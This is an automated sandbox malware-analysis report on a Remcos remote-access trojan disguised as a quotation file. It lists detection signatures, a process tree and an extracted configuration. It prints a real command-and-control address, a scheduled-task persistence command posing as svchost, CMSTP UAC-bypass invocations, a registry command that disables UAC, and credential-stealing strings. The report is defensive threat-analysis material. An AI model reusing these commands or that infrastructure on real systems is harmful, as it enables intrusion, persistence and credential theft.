Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION#30810.exe

Overview

General Information

Sample name:QUOTATION#30810.exe
Analysis ID:1435939
MD5:c828227db6d7bc08dd8e9b7313a0e770
SHA1:81a583b2e03ac3a7ad698ef8722fe30d5b67f3aa
SHA256:9b2562b80e435348cffe99ad86776e9cef9b3f2745b170f297de739ff8d55509
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with benign system names
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses Microsoft's Enhanced Cryptographic Provider
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • QUOTATION#30810.exe (PID: 4508 cmdline: "C:\Users\user\Desktop\QUOTATION#30810.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)
    • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6032 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2108 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1564 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 1896 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • svchost.exe (PID: 6092 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 2772 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)
        • conhost.exe (PID: 2916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • vbc.exe (PID: 5948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
        • csc.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • csc.exe (PID: 2536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • WerFault.exe (PID: 7080 cmdline: C:\Windows\system32\WerFault.exe -u -p 2772 -s 1072 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 5864 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C828227DB6D7BC08DD8E9B7313A0E770)
    • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_wp.exe (PID: 3020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe" MD5: EF2DCDFF05E9679F8D0E2895D9A2E3BB)
    • iexplore.exe (PID: 3068 cmdline: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • svchost.exe (PID: 5880 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • wab.exe (PID: 6508 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
    • vbc.exe (PID: 4360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • vbc.exe (PID: 1160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • vbc.exe (PID: 5944 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • vbc.exe (PID: 6836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\nglqvdfonaraelcbsvimoeayympwa" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • vbc.exe (PID: 2960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\yiqjvvqpbijnhrqfbgcgyquhzthfbppay" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • vbc.exe (PID: 6068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
    • WerFault.exe (PID: 4312 cmdline: C:\Windows\system32\WerFault.exe -u -p 5864 -s 1120 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 5572 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)
    • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmstp.exe (PID: 2824 cmdline: "c:\windows\system32\cmstp.exe" /au C:\windows\temp\macatsxh.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)
  • svchost.exe (PID: 6292 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5708 cmdline: C:\Windows\system32\WerFault.exe -pss -s 444 -p 5864 -ip 5864 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 2220 cmdline: C:\Windows\system32\WerFault.exe -pss -s 460 -p 2772 -ip 2772 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 1892 cmdline: C:\Windows\system32\WerFault.exe -pss -s 536 -p 6908 -ip 6908 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7060 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6908 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C828227DB6D7BC08DD8E9B7313A0E770)
    • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ngen.exe (PID: 1112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
    • WerFault.exe (PID: 6856 cmdline: C:\Windows\system32\WerFault.exe -u -p 6908 -s 1076 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6020 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C828227DB6D7BC08DD8E9B7313A0E770)
    • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmstp.exe (PID: 908 cmdline: "c:\windows\system32\cmstp.exe" /au C:\windows\temp\54bmrp0l.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)
    • cmstp.exe (PID: 7104 cmdline: "c:\windows\system32\cmstp.exe" /au C:\windows\temp\xrlumlnf.inf MD5: 4CC43FE4D397FF79FA69F397E016DF52)
  • taskkill.exe (PID: 5816 cmdline: taskkill /IM cmstp.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "172.245.208.13:4445:0", "Assigned name": "JONS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R7QS5C", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\macatsxh.infJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Windows\Temp\54bmrp0l.infJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Windows\Temp\xrlumlnf.infJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          SourceRuleDescriptionAuthorStrings
          0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000021.00000003.1770928480.000002453D6A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                00000021.00000003.1770848664.000002453D6A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  00000021.00000003.1770876326.000002453D6A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 59 entries
                    SourceRuleDescriptionAuthorStrings
                    15.2.svchost.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                      15.2.svchost.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                        15.2.svchost.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                        • 0x6aaa8:$a1: Remcos restarted by watchdog!
                        • 0x6b020:$a3: %02i:%02i:%02i:%03i
                        15.2.svchost.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                        • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                        • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                        • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                        • 0x64b6c:$str_b2: Executing file:
                        • 0x65bec:$str_b3: GetDirectListeningPort
                        • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                        • 0x65718:$str_b7: \update.vbs
                        • 0x64b94:$str_b9: Downloaded file:
                        • 0x64b80:$str_b10: Downloading file:
                        • 0x64c24:$str_b12: Failed to upload file:
                        • 0x65bb4:$str_b13: StartForward
                        • 0x65bd4:$str_b14: StopForward
                        • 0x65670:$str_b15: fso.DeleteFile "
                        • 0x65604:$str_b16: On Error Resume Next
                        • 0x656a0:$str_b17: fso.DeleteFolder "
                        • 0x64c14:$str_b18: Uploaded file:
                        • 0x64bd4:$str_b19: Unable to delete:
                        • 0x65638:$str_b20: while fso.FileExists("
                        • 0x650b1:$str_c0: [Firefox StoredLogins not found]
                        15.2.svchost.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                        • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                        • 0x6497c:$s1: CoGetObject
                        • 0x64990:$s1: CoGetObject
                        • 0x649ac:$s1: CoGetObject
                        • 0x6e938:$s1: CoGetObject
                        • 0x6493c:$s2: Elevation:Administrator!new:
                        Click to see the 44 entries

                        System Summary

                        barindex
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\QUOTATION#30810.exe, ProcessId: 4508, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#30810.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#30810.exe, ParentProcessId: 4508, ParentProcessName: QUOTATION#30810.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6032, ProcessName: cmd.exe
                        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#30810.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#30810.exe, ParentProcessId: 4508, ParentProcessName: QUOTATION#30810.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6032, ProcessName: cmd.exe
                        Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5864, ProcessName: svchost.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5864, ProcessName: svchost.exe
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Windows Mail\wab.exe", CommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5864, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", ProcessId: 6508, ProcessName: wab.exe
                        Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 5864, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6192, ProcessName: conhost.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\QUOTATION#30810.exe, ProcessId: 4508, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6032, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 2108, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1564, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 2772, ProcessName: svchost.exe
                        Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 5864, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION#30810.exe", ParentImage: C:\Users\user\Desktop\QUOTATION#30810.exe, ParentProcessId: 4508, ParentProcessName: QUOTATION#30810.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6032, ProcessName: cmd.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, ProcessId: 4360, TargetFilename: C:\ProgramData\remcos\logs.dat
                        Timestamp:05/03/24-13:16:08.720498
                        SID:2032777
                        Source Port:4445
                        Destination Port:49708
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:05/03/24-13:13:40.463525
                        SID:2032776
                        Source Port:49708
                        Destination Port:4445
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                        Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                        Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                        Source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "172.245.208.13:4445:0", "Assigned name": "JONS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R7QS5C", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                        Source: 172.245.208.13Virustotal: Detection: 17%Perma Link
                        Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 57%
                        Source: C:\Users\user\AppData\Roaming\svchost.exeVirustotal: Detection: 48%Perma Link
                        Source: QUOTATION#30810.exeReversingLabs: Detection: 57%
                        Source: QUOTATION#30810.exeVirustotal: Detection: 48%Perma Link
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
